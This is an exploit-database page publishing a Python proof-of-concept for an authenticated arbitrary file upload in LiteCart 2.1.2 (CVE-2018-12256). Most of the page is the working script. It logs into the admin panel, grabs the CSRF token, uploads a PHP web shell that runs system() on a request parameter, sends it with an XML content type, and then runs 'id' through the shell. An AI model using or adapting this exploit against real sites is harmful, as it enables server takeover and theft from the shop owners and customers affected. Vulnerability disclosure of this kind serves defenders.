LiteCart 2.1.2 Arbitrary File Upload

2018.08.28
Credit: Haboob Team
Risk: High
Local: No
Remote: Yes
CWE: CWE-264

# Exploit Title: LiteCart 2.1.2 - Arbitrary File Upload # Date: 2018-08-27 # Exploit Author: Haboob Team # Software Link: https://www.litecart.net/downloading?version=2.1.2 # Version: 2.1.2 # CVE : CVE-2018-12256 # 1. Description # admin/vqmods.app/vqmods.inc.php in LiteCart 2.1.2 allows remote authenticated attackers # to upload a malicious file (resulting in remote code execution) by using the text/xml # or application/xml Content-Type in a public_html/admin/?app=vqmods&doc=vqmods request. # 2. Proof of Concept #!/usr/bin/env python import mechanize import cookielib import urllib2 import requests import sys import argparse import random import string parser = argparse.ArgumentParser(description='LiteCart') parser.add_argument('-t', help='admin login page url - EX: https://IPADDRESS/admin/') parser.add_argument('-p', help='admin password') parser.add_argument('-u', help='admin username') args = parser.parse_args() if(not args.u or not args.t or not args.p): sys.exit("-h for help") url = args.t user = args.u password = args.p br = mechanize.Browser() cookiejar = cookielib.LWPCookieJar() br.set_cookiejar( cookiejar ) br.set_handle_equiv( True ) br.set_handle_redirect( True ) br.set_handle_referer( True ) br.set_handle_robots( False ) br.addheaders = [ ( 'User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1' ) ] response = br.open(url) br.select_form(name="login_form") br["username"] = user br["password"] = password res = br.submit() response = br.open(url + "?app=vqmods&doc=vqmods") one="" for form in br.forms(): one= str(form).split("(") one= one[1].split("=") one= one[1].split(")") one = one[0] cookies = br._ua_handlers['_cookies'].cookiejar cookie_dict = {} for c in cookies: cookie_dict[c.name] = c.value rand = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(5)) files = { 'vqmod': (rand + ".php", "<?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); } ?>", "application/xml"), 'token':one, 'upload':(None,"Upload") } response = requests.post(url + "?app=vqmods&doc=vqmods", files=files, cookies=cookie_dict) r = requests.get(url + "../vqmod/xml/" + rand + ".php?c=id") if r.status_code == 200: print "Shell => " + url + "../vqmod/xml/" + rand + ".php?c=id" print r.content else: print "Sorry something went wrong"


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top